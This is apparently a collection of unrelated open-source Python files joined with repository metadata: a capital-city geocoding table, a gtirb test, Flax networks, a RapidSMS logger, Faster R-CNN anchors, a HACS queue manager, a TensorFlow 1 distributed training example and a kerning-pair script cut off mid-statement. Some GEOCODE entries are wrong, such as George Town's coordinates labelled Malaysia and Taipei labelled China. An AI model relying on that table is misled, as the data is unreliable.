main = lambda tag: tag in ("ar-AE", "en-US", "zh-CN") or tag[:2] == tag[3:].lower() # nl-NL
a = [language+"-"+r for r in regions(language.lower())]
a = sorted(a, key=main, reverse=True)
return a
def market(language):
""" Returns the first item from regionalize(language).
"""
a = regionalize(language)
a = len(a) > 0 and a[0] or None
return a
#print encode_language("dutch") # nl
#print decode_language("nl") # Dutch
#print encode_region("belgium") # BE
#print decode_region("be") # Belgium
#print languages("be") # ["fr", "nl"]
#print regions("nl") # ["NL", "BE"]
#print regionalize("nl") # ["nl-NL", "nl-BE"]
### GEOCODE ########################################################################################
# capital => (latitude, longitude, ISO-639 language code, region)
GEOCODE = {
u'Abu Dhabi': ( 24.467, 54.367, u"ar", u"United Arab Emirates"),
u'Abuja': ( 9.083, 7.533, u"en", u"Nigeria"),
u'Accra': ( 5.550, -0.217, u"en", u"Ghana"),
u'Algiers': ( 36.750, 3.050, u"ar", u"Algeria"),
u'Amman': ( 31.950, 35.933, u"ar", u"Jordan"),
u'Amsterdam': ( 52.383, 4.900, u"nl", u"Netherlands"),
u'Ankara': ( 39.933, 32.867, u"tr", u"Turkey"),
u'Astana': ( 51.167, 71.417, u"ru", u"Kazakhstan"),
u'Asuncion': (-25.267, -57.667, u"es", u"Paraguay"),
u'Athens': ( 37.983, 23.733, u"el", u"Greece"),
u'Baghdad': ( 33.333, 44.383, u"ar", u"Iraq"),
u'Bamako': ( 12.650, -8.000, u"fr", u"Mali"),
u'Bangkok': ( 13.750, 100.517, u"th", u"Thailand"),
u'Bangui': ( 4.367, 18.583, u"fr", u"Central African Republic"),
u'Beijing': ( 39.917, 116.383, u"zh", u"China"),
u'Beirut': ( 33.867, 35.500, u"ar", u"Lebanon"),
u'Belgrade': ( 44.833, 20.500, u"sr", u"Serbia"),
u'Berlin': ( 52.517, 13.400, u"de", u"Germany"),
u'Bern': ( 46.950, 7.433, u"de", u"Switzerland"),
u'Bissau': ( 11.850, -15.583, u"pt", u"Guinea-Bissau"),
u'Bogota': ( 4.600, -74.083, u"es", u"Colombia"),
u'Brasilia': (-15.783, -47.917, u"pt", u"Brazil"),
u'Bratislava': ( 48.150, 17.117, u"sk", u"Slovakia"),
u'Brazzaville': ( -4.250, 15.283, u"fr", u"Congo"),
u'Brussels': ( 50.833, 4.333, u"nl", u"Belgium"),
u'Bucharest': ( 44.433, 26.100, u"ro", u"Romania"),
u'Budapest': ( 47.500, 19.083, u"hu", u"Hungary"),
u'Buenos Aires': (-34.600, -58.667, u"es", u"Argentina"),
u'Bujumbura': ( -3.367, 29.350, u"rn", u"Burundi"),
u'Cairo': ( 30.050, 31.250, u"ar", u"Egypt"),
u'Canberra': (-35.283, 149.217, u"en", u"Australia"),
u'Caracas': ( 10.500, -66.933, u"es", u"Venezuela"),
u'Chisinau': ( 47.000, 28.850, u"ro", u"Moldova"),
u'Colombo': ( 6.933, 79.850, u"si", u"Sri Lanka"),
u'Conakry': ( 9.550, -13.700, u"fr", u"Guinea"),
u'Copenhagen': ( 55.667, 12.583, u"da", u"Denmark"),
u'Dakar': ( 14.683, -17.433, u"fr", u"Senegal"),
u'Damascus': ( 33.500, 36.300, u"ar", u"Syria"),
u'Dar es Salaam': ( -6.800, 39.283, u"sw", u"Tanzania"),
u'Dhaka': ( 23.717, 90.400, u"bn", u"Bangladesh"),
u'Dublin': ( 53.317, -6.233, u"en", u"Ireland"),
u'Freetown': ( 8.500, -13.250, u"en", u"Sierra Leone"),
u'George Town': ( 19.300, -81.383, u"en", u"Malaysia"),
u'Georgetown': ( 6.800, -58.167, u"en", u"Guyana"),
u'Guatemala City': ( 14.617, -90.517, u"es", u"Guatemala"),
u'Hanoi': ( 21.033, 105.850, u"vi", u"Vietnam"),
u'Harare': (-17.833, 31.050, u"en", u"Zimbabwe"),
u'Havana': ( 23.117, -82.350, u"es", u"Cuba"),
u'Helsinki': ( 60.167, 24.933, u"fi", u"Finland"),
u'Islamabad': ( 33.700, 73.167, u"ur", u"Pakistan"),
u'Jakarta': ( -6.167, 106.817, u"ms", u"Indonesia"),
u'Jerusalem': ( 31.767, 35.233, u"he", u"Israel"),
u'Juba': ( 4.850, 31.617, u"en", u"Sudan"),
u'Kabul': ( 34.517, 69.183, u"fa", u"Afghanistan"),
u'Kampala': ( 0.317, 32.417, u"en", u"Uganda"),
u'Kathmandu': ( 27.717, 85.317, u"ne", u"Nepal"),
u'Khartoum': ( 15.600, 32.533, u"ar", u"Sudan"),
u'Kiev': ( 50.433, 30.517, u"uk", u"Ukraine"),
u'Kigali': ( -1.950, 30.067, u"rw", u"Rwanda"),
u'Kingston': ( 18.000, -76.800, u"en", u"Jamaica"),
u'Kinshasa': ( -4.317, 15.300, u"fr", u"Congo"),
u'Kuala Lumpur': ( 3.167, 101.700, u"ms", u"Malaysia"),
u'Kuwait City': ( 29.367, 47.967, u"ar", u"Kuwait"),
u'La Paz': (-16.500, -68.150, u"es", u"Bolivia"),
u'Lima': (-12.050, -77.050, u"es", u"Peru"),
u'Lisbon': ( 38.717, -9.133, u"pt", u"Portugal"),
u'Ljubljana': ( 46.050, 14.517, u"sl", u"Slovenia"),
u'Lome': ( 6.133, 1.217, u"fr", u"Togo"),
u'London': ( 51.500, -0.167, u"en", u"United Kingdom"),
u'Luanda': ( -8.833, 13.233, u"pt", u"Angola"),
u'Lusaka': (-15.417, 28.283, u"en", u"Zambia"),
u'Luxembourg': ( 49.600, 6.117, u"lb", u"Luxembourg"),
u'Madrid': ( 40.400, -3.683, u"es", u"Spain"),
u'Managua': ( 12.150, -86.283, u"es", u"Nicaragua"),
u'Manila': ( 14.583, 121.000, u"tl", u"Philippines"),
u'Maputo': (-25.950, 32.583, u"pt", u"Mozambique"),
u'Mexico City': ( 19.433, -99.133, u"es", u"Mexico"),
u'Minsk': ( 53.900, 27.567, u"be", u"Belarus"),
u'Mogadishu': ( 2.067, 45.367, u"so", u"Somalia"),
u'Monaco': ( 43.733, 7.417, u"fr", u"Monaco"),
u'Monrovia': ( 6.300, -10.800, u"en", u"Liberia"),
u'Montevideo': (-34.883, -56.183, u"es", u"Uruguay"),
u'Moscow': ( 55.750, 37.583, u"ru", u"Russia"),
u'Muscat': ( 23.617, 58.583, u"ar", u"Oman"),
u'Nairobi': ( -1.283, 36.817, u"en", u"Kenya"),
u'Nassau': ( 25.083, -77.350, u"en", u"Bahamas"),
u'New Delhi': ( 28.600, 77.200, u"hi", u"India"),
u'New York': ( 40.756, -73.987, u"en", u"United States"),
u'Niamey': ( 13.517, 2.117, u"fr", u"Niger"),
u'Oslo': ( 59.917, 10.750, u"no", u"Norway"),
u'Ottawa': ( 45.417, -75.700, u"en", u"Canada"),
u'Panama City': ( 8.967, -79.533, u"es", u"Panama"),
u'Paris': ( 48.867, 2.333, u"fr", u"France"),
u'Philipsburg': ( 18.017, -63.033, u"en", u"Sint Maarten"),
u'Phnom Penh': ( 11.550, 104.917, u"km", u"Cambodia"),
u'Port Louis': (-20.150, 57.483, u"en", u"Mauritius"),
u'Port-au-Prince': ( 18.533, -72.333, u"fr", u"Haiti"),
u'Porto-Novo': ( 6.483, 2.617, u"fr", u"Benin"),
u'Prague': ( 50.083, 14.467, u"cs", u"Czech Republic"),
u'Pretoria': (-25.700, 28.217, u"xh", u"South Africa"),
u'Pyongyang': ( 39.017, 125.750, u"ko", u"North Korea"),
u'Quito': ( -0.217, -78.500, u"es", u"Ecuador"),
u'Rabat': ( 34.017, -6.817, u"ar", u"Morocco"),
u'Rangoon': ( 16.800, 96.150, u"my", u"Myanmar"),
u'Reykjavik': ( 64.150, -21.950, u"is", u"Iceland"),
u'Riga': ( 56.950, 24.100, u"lv", u"Latvia"),
u'Riyadh': ( 24.633, 46.717, u"ar", u"Saudi Arabia"),
u'Rome': ( 41.900, 12.483, u"it", u"Italy"),
u'Saipan': ( 15.200, 145.750, u"en", u"Saipan"),
u'San Jose': ( 9.933, -84.083, u"es", u"Costa Rica"),
u'San Juan': ( 18.467, -66.117, u"es", u"Puerto Rico"),
u'San Marino': ( 43.933, 12.417, u"it", u"San Marino"),
u'San Salvador': ( 13.700, -89.200, u"es", u"El Salvador"),
u'Sanaa': ( 15.350, 44.200, u"ar", u"Yemen"),
u'Santiago': (-33.450, -70.667, u"es", u"Chile"),
u'Santo Domingo': ( 18.467, -69.900, u"es", u"Dominican Republic"),
u'Sarajevo': ( 43.867, 18.417, u"bs", u"Bosnia and Herzegovina"),
u'Seoul': ( 37.550, 126.983, u"ko", u"South Korea"),
u'Singapore': ( 1.283, 103.850, u"en", u"Singapore"),
u'Skopje': ( 42.000, 21.433, u"mk", u"Macedonia"),
u'Sofia': ( 42.683, 23.317, u"bg", u"Bulgaria"),
u'Stockholm': ( 59.333, 18.050, u"sv", u"Sweden"),
u'Taipei': ( 25.050, 121.500, u"zh", u"China"),
u'Tallinn': ( 59.433, 24.717, u"et", u"Estonia"),
u'Tashkent': ( 41.333, 69.300, u"uz", u"Uzbekistan"),
u'Tegucigalpa': ( 14.100, -87.217, u"es", u"Honduras"),
u'Tehran': ( 35.667, 51.417, u"fa", u"Iran"),
u'Tirana': ( 41.317, 19.817, u"sq", u"Albania"),
u'Tokyo': ( 35.683, 139.750, u"ja", u"Japan"),
u'Torshavn': ( 62.017, -6.767, u"fo", u"Faroe Islands"),
u'Tripoli': ( 32.883, 13.167, u"ar", u"Libya"),
u'Tunis': ( 36.800, 10.183, u"ar", u"Tunisia"),
u'Vaduz': ( 47.133, 9.517, u"de", u"Liechtenstein"),
u'Vatican City': ( 41.900, 12.450, u"it", u"Vatican City"),
u'Vienna': ( 48.200, 16.367, u"de", u"Austria"),
u'Vientiane': ( 17.967, 102.600, u"lo", u"Laos"),
u'Vilnius': ( 54.683, 25.317, u"lt", u"Lithuania"),
u'Warsaw': ( 52.250, 21.000, u"pl", u"Poland"),
u'Washington': ( 38.883, -77.033, u"en", u"United States"),
u'Wellington': (-41.467, 174.850, u"en", u"New Zealand"),
u'Yamoussoukro': ( 6.817, -5.283, u"fr", u"Côte d'Ivoire"),
u'Yaounde': ( 3.867, 11.517, u"en", u"Cameroon"),
u'Zagreb': ( 45.800, 16.000, u"hr", u"Croatia")
}
def geocode(location):
""" Returns a (latitude, longitude, language code, region)-tuple
for the given city (mostly capitals).
"""
if location in GEOCODE:
return GEOCODE[location]
for k, v in GEOCODE.items():
if location.lower() == k.lower():
return v
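# Commented usage example for geocode(), mirroring the checks above; the expected tuple
# simply echoes the GEOCODE entry listed earlier, and lookups are case-insensitive:
#print geocode(u"Brussels") # (50.833, 4.333, u"nl", u"Belgium")
#print geocode(u"brussels") # same tuple, matched via the lowercase fallback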
|
68f5f98aed53953721cd0479ed12a694d075e457
|
25a08bdeb17a0dc032ddf6c11b71693ca4c1a6cd
|
/python/tests/test_byte_intervals_at.py
|
ddf6fe981f46cd1bad320a75159b739bc9dc148c
|
[
"MIT"
] |
permissive
|
GrammaTech/gtirb
|
20b05dc6170d93af8cc29fd65f7094bd59a9fb4d
|
f4301401a0d98a783e3b6f40e390fe9b1b1d386d
|
refs/heads/master
| 2023-08-18T12:17:45.797733
| 2023-08-14T23:28:22
| 2023-08-15T12:02:48
| 136,977,182
| 277
| 40
|
MIT
| 2019-01-08T01:43:01
| 2018-06-11T20:25:41
|
C++
|
UTF-8
|
Python
| false
| false
| 1,652
|
py
|
test_byte_intervals_at.py
|
import unittest
import gtirb
from helpers import SearchScope, parameterize_one
class ByteIntervalsAtTests(unittest.TestCase):
@parameterize_one(
"scope", (SearchScope.ir, SearchScope.module, SearchScope.section)
)
def test_byte_intervals_at(self, scope):
ir = gtirb.IR()
m = gtirb.Module(name="test", ir=ir)
s = gtirb.Section(module=m)
search_in = scope.select(ir, m, s, None)
bi1 = gtirb.ByteInterval(address=0x1000, size=4, section=s)
bi2 = gtirb.ByteInterval(address=0x1004, size=4, section=s)
found = set(search_in.byte_intervals_at(0x1000))
self.assertEqual(found, {bi1})
found = set(search_in.byte_intervals_at(0x1001))
self.assertEqual(found, set())
found = set(search_in.byte_intervals_at(range(0x1000, 0x1008)))
self.assertEqual(found, {bi1, bi2})
found = set(search_in.byte_intervals_at(range(0x1000, 0x1008, 16)))
self.assertEqual(found, {bi1})
# Change the address to verify we update the index
bi2.address = 0x2000
found = set(search_in.byte_intervals_at(0x1004))
self.assertEqual(found, set())
found = set(search_in.byte_intervals_at(0x2000))
self.assertEqual(found, {bi2})
# Discard the interval to verify we update the index
bi2.section = None
found = set(search_in.byte_intervals_at(0x2000))
self.assertEqual(found, set())
# Now add it back to verify we update the index
s.byte_intervals.add(bi2)
found = set(search_in.byte_intervals_at(0x2000))
self.assertEqual(found, {bi2})
|
7bfabcb3eb54b485eefeb1d75d6453163fabd31e
|
9b59c5ce1b57b8bd066fcee4b55c821893bc50fb
|
/balloon_learning_environment/agents/networks.py
|
9fc9db4d81c58206988568c5c4fe02b91e7e94e9
|
[
"Apache-2.0"
] |
permissive
|
google/balloon-learning-environment
|
b485c62bab04ce8308ed8de3358d4303e601cf18
|
72082feccf404e5bf946e513e4f6c0ae8fb279ad
|
refs/heads/master
| 2023-08-31T04:41:02.819901
| 2022-12-19T17:14:38
| 2022-12-19T17:18:57
| 418,619,484
| 108
| 14
|
Apache-2.0
| 2023-08-16T23:21:29
| 2021-10-18T18:20:09
|
Python
|
UTF-8
|
Python
| false
| false
| 3,593
|
py
|
networks.py
|
# coding=utf-8
# Copyright 2022 The Balloon Learning Environment Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A common set of networks available for agents."""
from absl import logging
from dopamine.discrete_domains import atari_lib
from flax import linen as nn
import gin
import jax
import jax.numpy as jnp
@gin.configurable
class MLPNetwork(nn.Module):
"""A simple MLP network."""
num_actions: int
num_layers: int = gin.REQUIRED
hidden_units: int = gin.REQUIRED
is_dopamine: bool = False
@nn.compact
def __call__(self, x: jnp.ndarray):
# This method sets up the MLP for inference, using the specified number of
# layers and units.
logging.info('Creating MLP network with %d layers and %d hidden units',
self.num_layers, self.hidden_units)
# Network initializer.
kernel_initializer = jax.nn.initializers.glorot_uniform()
x = x.astype(jnp.float32) # Convert to JAX float32 type.
x = x.reshape(-1) # Flatten.
# Pass through the desired number of hidden layers (we do this for
# one less than `self.num_layers`, as the final Dense layer below counts as one).
for _ in range(self.num_layers - 1):
x = nn.Dense(features=self.hidden_units,
kernel_init=kernel_initializer)(x)
x = nn.relu(x)
# The final layer will output a value for each action.
q_values = nn.Dense(features=self.num_actions,
kernel_init=kernel_initializer)(x)
if self.is_dopamine:
q_values = atari_lib.DQNNetworkType(q_values)
return q_values
@gin.configurable
class QuantileNetwork(nn.Module):
"""Network used to compute the agent's return quantiles."""
num_actions: int
num_layers: int = gin.REQUIRED
hidden_units: int = gin.REQUIRED
num_atoms: int = 51 # Normally set by JaxQuantileAgent.
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x: jnp.ndarray):
# This method sets up the MLP for inference, using the specified number of
# layers and units.
logging.info('Creating MLP network with %d layers, %d hidden units, and '
'%d atoms', self.num_layers, self.hidden_units, self.num_atoms)
# Network initializer.
kernel_initializer = nn.initializers.variance_scaling(
scale=1.0 / jnp.sqrt(3.0),
mode='fan_in',
distribution='uniform')
x = x.astype(jnp.float32) # Convert to JAX float32 type.
x = x.reshape(-1) # Flatten.
# Pass through the desired number of hidden layers (we do this for
# one less than `self.num_layers`, as the final Dense layer below counts as one).
for _ in range(self.num_layers - 1):
x = nn.Dense(features=self.hidden_units,
kernel_init=kernel_initializer)(x)
x = nn.relu(x)
x = nn.Dense(features=self.num_actions * self.num_atoms,
kernel_init=kernel_initializer)(x)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.mean(logits, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
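# Illustrative usage sketch (not part of the original module): constructing an MLPNetwork
# directly and initializing it with flax's functional API. The observation size, layer count
# and hidden-unit count below are arbitrary assumptions; in the real agents these values are
# supplied through gin bindings.
#
# import jax
# import jax.numpy as jnp
#
# network = MLPNetwork(num_actions=4, num_layers=3, hidden_units=128)
# dummy_obs = jnp.zeros((8,)) # flattened observation
# params = network.init(jax.random.PRNGKey(0), dummy_obs)
# q_values = network.apply(params, dummy_obs) # shape (4,), one Q-value per action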
|
ab060bc6c79e5cdbb1438f1eea14075eec0ef9d3
|
7ae9aa9e9d359e2182bbab6ae7e083fc2c7fa815
|
/rapidsms/contrib/messagelog/app.py
|
b20e79319daf877d65505d4de8f23649557623d7
|
[
"BSD-3-Clause"
] |
permissive
|
rapidsms/rapidsms
|
8ce6d3f46002146e76cf68fdca3288865578b17a
|
aaa2ddab68e19d979525c3823c3ec0e646e92c83
|
refs/heads/develop
| 2023-08-15T16:44:27.206841
| 2022-03-16T15:09:36
| 2022-03-16T15:09:36
| 132,857
| 409
| 196
|
BSD-3-Clause
| 2023-09-11T20:41:56
| 2009-02-19T22:21:40
|
Python
|
UTF-8
|
Python
| false
| false
| 861
|
py
|
app.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from django.utils import timezone
from rapidsms.apps.base import AppBase
from .models import Message
class MessageLogApp(AppBase):
def _log(self, direction, msg):
if not msg.connections:
raise ValueError
text = msg.raw_text if direction == Message.INCOMING else msg.text
return Message.objects.create(
date=timezone.now(),
direction=direction,
text=text,
contact=msg.connections[0].contact,
connection=msg.connections[0],
)
def parse(self, msg):
# annotate the message as we log them in case any other apps
# want a handle to them
msg.logger_msg = self._log(Message.INCOMING, msg)
def outgoing(self, msg):
msg.logger_msg = self._log(Message.OUTGOING, msg)
|
838a86beda590c0b23da872c1961d4f7b88e919e
|
39cbaf37db9eb60abca67cfc513eca81397f1a14
|
/contrib/0.挖宝行动/awebone-护肤品识别/llib/layer_utils/snippets.py
|
a4335936245e515b102aef8575014b08670990d6
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/ModelArts-Lab
|
6d8255a0ac608d79a44cef515f0cbd98b855b15f
|
ce1a275fa5fe08c0873a9318d8e66e3eef08d4ba
|
refs/heads/master
| 2023-08-23T03:18:55.729714
| 2023-04-28T06:55:07
| 2023-04-28T06:55:07
| 185,701,977
| 1,117
| 1,102
|
Apache-2.0
| 2023-07-20T15:05:59
| 2019-05-09T01:08:50
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,348
|
py
|
snippets.py
|
# --------------------------------------------------------
# Tensorflow Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from lib.layer_utils.generate_anchors import generate_anchors
def generate_anchors_pre(height, width, feat_stride, anchor_scales=(8, 16, 32), anchor_ratios=(0.5, 1, 2)):
""" A wrapper function to generate anchors given different scales
Also return the number of anchors in variable 'length'
"""
anchors = generate_anchors(ratios=np.array(anchor_ratios), scales=np.array(anchor_scales))
A = anchors.shape[0]
shift_x = np.arange(0, width) * feat_stride
shift_y = np.arange(0, height) * feat_stride
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
shifts = np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel())).transpose()
K = shifts.shape[0]
# width changes faster, so here it is H, W, C
anchors = anchors.reshape((1, A, 4)) + shifts.reshape((1, K, 4)).transpose((1, 0, 2))
anchors = anchors.reshape((K * A, 4)).astype(np.float32, copy=False)
length = np.int32(anchors.shape[0])
return anchors, length
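# Worked example (illustrative, not from the original file): with the default 3 scales x 3
# ratios there are A = 9 base anchors, so a 38 x 50 feature map at stride 16 yields
# length = 38 * 50 * 9 = 17100 anchors, each an (x1, y1, x2, y2) box in image coordinates.
#
# anchors, length = generate_anchors_pre(38, 50, 16)
# assert anchors.shape == (17100, 4) and length == 17100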
|
17b728cc5ea7edf19bc22f4daa8a7cbb83f9d77d
|
fd3047a84c7a144463d106c663537d055482f12e
|
/custom_components/hacs/utils/queue_manager.py
|
8bc77145d22ceb07b28003c6337c32642c993c0c
|
[
"MIT"
] |
permissive
|
hacs/integration
|
827370c861aff9de08e536e71866313228eeb66e
|
6a27b0a4b74ed4161185af438bcff5aec926f4d9
|
refs/heads/main
| 2023-09-04T04:33:35.834376
| 2023-08-27T08:53:58
| 2023-08-27T08:53:58
| 172,733,314
| 3,601
| 902
|
MIT
| 2023-09-11T07:00:42
| 2019-02-26T15:01:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,459
|
py
|
queue_manager.py
|
"""The QueueManager class."""
from __future__ import annotations
import asyncio
import time
from typing import Coroutine
from homeassistant.core import HomeAssistant
from ..exceptions import HacsExecutionStillInProgress
from .logger import LOGGER
_LOGGER = LOGGER
class QueueManager:
"""The QueueManager class."""
def __init__(self, hass: HomeAssistant) -> None:
self.hass = hass
self.queue: list[Coroutine] = []
self.running = False
@property
def pending_tasks(self) -> int:
"""Return a count of pending tasks in the queue."""
return len(self.queue)
@property
def has_pending_tasks(self) -> bool:
"""Return a count of pending tasks in the queue."""
return self.pending_tasks != 0
def clear(self) -> None:
"""Clear the queue."""
self.queue = []
def add(self, task: Coroutine) -> None:
"""Add a task to the queue."""
self.queue.append(task)
async def execute(self, number_of_tasks: int | None = None) -> None:
"""Execute the tasks in the queue."""
if self.running:
_LOGGER.debug("<QueueManager> Execution is already running")
raise HacsExecutionStillInProgress
if len(self.queue) == 0:
_LOGGER.debug("<QueueManager> The queue is empty")
return
self.running = True
_LOGGER.debug("<QueueManager> Checking out tasks to execute")
local_queue = []
if number_of_tasks:
for task in self.queue[:number_of_tasks]:
local_queue.append(task)
else:
for task in self.queue:
local_queue.append(task)
for task in local_queue:
self.queue.remove(task)
_LOGGER.debug("<QueueManager> Starting queue execution for %s tasks", len(local_queue))
start = time.time()
result = await asyncio.gather(*local_queue, return_exceptions=True)
for entry in result:
if isinstance(entry, Exception):
_LOGGER.error("<QueueManager> %s", entry)
end = time.time() - start
_LOGGER.debug(
"<QueueManager> Queue execution finished for %s tasks finished in %.2f seconds",
len(local_queue),
end,
)
if self.has_pending_tasks:
_LOGGER.debug("<QueueManager> %s tasks remaining in the queue", len(self.queue))
self.running = False
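# Minimal usage sketch (illustrative only, not part of the original file): tasks are plain
# coroutines added with add() and awaited in bulk from another coroutine via execute().
# The hass instance, _refresh coroutine and repository object below are placeholders.
#
# queue = QueueManager(hass)
# queue.add(_refresh(repository))
# await queue.execute(number_of_tasks=10) # gathers at most 10 queued tasks concurrently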
|
83f147e0cea3498bd44f34f774a47d2879febaeb
|
f27e3fdc97290b1db6d3fa7039ad59e4f8b5a760
|
/tensorflow-1/comet-tf1-distributed-mirrored-strategy.py
|
2416d030b75a9ece44fea05c33f54dd5201013f8
|
[] |
no_license
|
comet-ml/comet-examples
|
9c7bcea8b97986fb7987cbe0f4533f619e2a0939
|
9da5d4f296e633bb7e63b47dc2d3f7a0780c0a4e
|
refs/heads/master
| 2023-08-19T03:32:51.864273
| 2023-08-09T09:30:34
| 2023-08-09T09:30:34
| 158,587,515
| 134
| 55
| null | 2023-09-13T16:58:41
| 2018-11-21T18:00:34
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,479
|
py
|
comet-tf1-distributed-mirrored-strategy.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
# Copyright (C) 2021 Comet ML INC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import comet_ml
# Import TensorFlow
import tensorflow as tf
# Helper libraries
import numpy as np
import os
PROJECT_NAME = "tf1-mirrored"
experiment = comet_ml.Experiment(project_name=PROJECT_NAME)
print(tf.__version__)
fashion_mnist = tf.keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
# Adding a dimension to the array -> new shape == (28, 28, 1)
# We are doing this because the first layer in our model is a convolutional
# layer and it requires a 4D input (batch_size, height, width, channels).
# batch_size dimension will be added later on.
train_images = train_images[..., None]
test_images = test_images[..., None]
# Getting the images in [0, 1] range.
train_images = train_images / np.float32(255)
test_images = test_images / np.float32(255)
train_labels = train_labels.astype("int64")
test_labels = test_labels.astype("int64")
# If the list of devices is not specified in the
# `tf.distribute.MirroredStrategy` constructor, it will be auto-detected.
strategy = tf.distribute.MirroredStrategy()
print("Number of devices: {}".format(strategy.num_replicas_in_sync))
BUFFER_SIZE = len(train_images)
BATCH_SIZE_PER_REPLICA = 64
BATCH_SIZE = BATCH_SIZE_PER_REPLICA * strategy.num_replicas_in_sync
EPOCHS = 10
STEPS_PER_EPOCH = 100
with strategy.scope():
train_dataset = (
tf.data.Dataset.from_tensor_slices((train_images, train_labels))
.shuffle(BUFFER_SIZE)
.batch(BATCH_SIZE)
)
train_ds = strategy.experimental_distribute_dataset(train_dataset)
test_dataset = tf.data.Dataset.from_tensor_slices((test_images, test_labels)).batch(
BATCH_SIZE
)
test_ds = strategy.experimental_distribute_dataset(test_dataset)
model = tf.keras.Sequential(
[
tf.keras.layers.Conv2D(32, 3, activation="relu", input_shape=(28, 28, 1)),
tf.keras.layers.MaxPooling2D(),
tf.keras.layers.Conv2D(64, 3, activation="relu"),
tf.keras.layers.MaxPooling2D(),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(64, activation="relu"),
tf.keras.layers.Dense(10, activation="softmax"),
]
)
optimizer = tf.train.GradientDescentOptimizer(0.001)
def train_step(dist_inputs):
def step_fn(inputs):
images, labels = inputs
logits = model(images)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits, labels=labels
)
loss = tf.reduce_sum(cross_entropy) * (1.0 / BATCH_SIZE)
train_op = optimizer.minimize(loss)
with tf.control_dependencies([train_op]):
return tf.identity(loss)
per_replica_losses = strategy.experimental_run_v2(step_fn, args=(dist_inputs,))
mean_loss = strategy.reduce(
tf.distribute.ReduceOp.SUM, per_replica_losses, axis=None
)
return mean_loss
train_iterator = train_ds.make_initializable_iterator()
iterator_init = train_iterator.initializer
var_init = tf.global_variables_initializer()
loss = train_step(next(train_iterator))
with tf.train.MonitoredTrainingSession() as sess:
sess.run([var_init])
for epoch in range(EPOCHS):
sess.run([iterator_init])
for step in range(STEPS_PER_EPOCH):
current_loss = sess.run(loss)
if step % 10 == 0:
print(
"Epoch {} Step {} Loss {:.4f}".format(epoch, step, current_loss)
)
experiment.log_metric(
"loss", current_loss, step=(STEPS_PER_EPOCH * epoch) + step
)
|
3b15358fa977202265527280acf2d90bad96b249
|
e67944ffe8f8757d64b0fb92172718c139e2c41b
|
/3G_total_count.py
|
65bcc8b8e899ac6a40e6732700be7f3b6b75a5dc
|
[
"MIT"
] |
permissive
|
andre-fuchs/kerning-pairs
|
64f4cef64f3a2a6ce3bf56f88db8bfac380e1264
|
bfd95de7fb1ccd00d5bba9913deead83fddfb3f5
|
refs/heads/master
| 2023-08-16T16:57:39.179108
| 2023-08-14T12:03:56
| 2023-08-14T12:03:56
| 222,538,080
| 127
| 5
|
MIT
| 2023-08-14T12:03:58
| 2019-11-18T20:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 3,315
|
py
|
3G_total_count.py
|
"""
This script merges all language-specific letter pairs into a global total.
By using the highscores instead of the total sum or an average, no relevant
pair of any language gets lost or ranked down.
"""
import json
import operator
from collections import defaultdict
from pprint import pprint
LANGUAGES = [
"cs",
"de",
"en",
"es",
"et",
"fi",
"fr",
"hu",
"it",
"nl",
"no",
"pl",
"pt",
"se",
"sv",
"da",
"hr",
"sl",
"lt",
"tr",
"lv",
"ro",
"sk",
"sq",
]
QUOTES = ['"', "'", "«", "»", "‘", "’", "‚", "‛", "“", "”", "„", "‟", "‹", "›"]
# HIGHSCORES
globalLetterPairs = {}
for LANGUAGE in LANGUAGES:
# Dictionaries to store all pairs containing quotes
# To generate all possible stylistic alternates
leftQuotes = defaultdict(lambda: 1)
rightQuotes = defaultdict(lambda: 1)
with open("count/by_language/" + LANGUAGE + "/list.json", "r") as inputList, open(
"count/by_language/" + LANGUAGE + "/dictionary.json", "r"
) as inputDict:
letterPairs = dict(json.load(inputList))
totalValue = letterPairs["total"]
print(LANGUAGE, "Raw number of pairs:", len(letterPairs))
# Sum up all quotes
parentDict = json.load(inputDict)
for leftLetter, childrenDict in parentDict.items():
for rightLetter, count in childrenDict.items():
if leftLetter in QUOTES:
leftQuotes[rightLetter] += count
if rightLetter in QUOTES:
rightQuotes[leftLetter] += count
# Remove all keys containing quotes
letterPairs = {
k: v
for k, v in letterPairs.items()
if not any(QUOTE in k for QUOTE in QUOTES)
}
print(LANGUAGE, "Without quotes", len(letterPairs))
# Overwrite/add pairs containing representative quote characters
for rightLetter, count in leftQuotes.items():
for QUOTE in ['"', "„", "«", "»"]:
letterPairs[QUOTE + rightLetter] = count
for leftLetter, count in rightQuotes.items():
for QUOTE in ['"', "«", "»"]:
letterPairs[leftLetter + QUOTE] = count
print(LANGUAGE, "With all placeholder quotes", len(letterPairs))
# Clamp below minimum count of 1 per book (100 pages à 3000 characters)
letterPairs = {k: v / totalValue * 3000 * 100 for k, v in letterPairs.items()}
# Stores the highest existing value of the given languages
globalLetterPairs = {
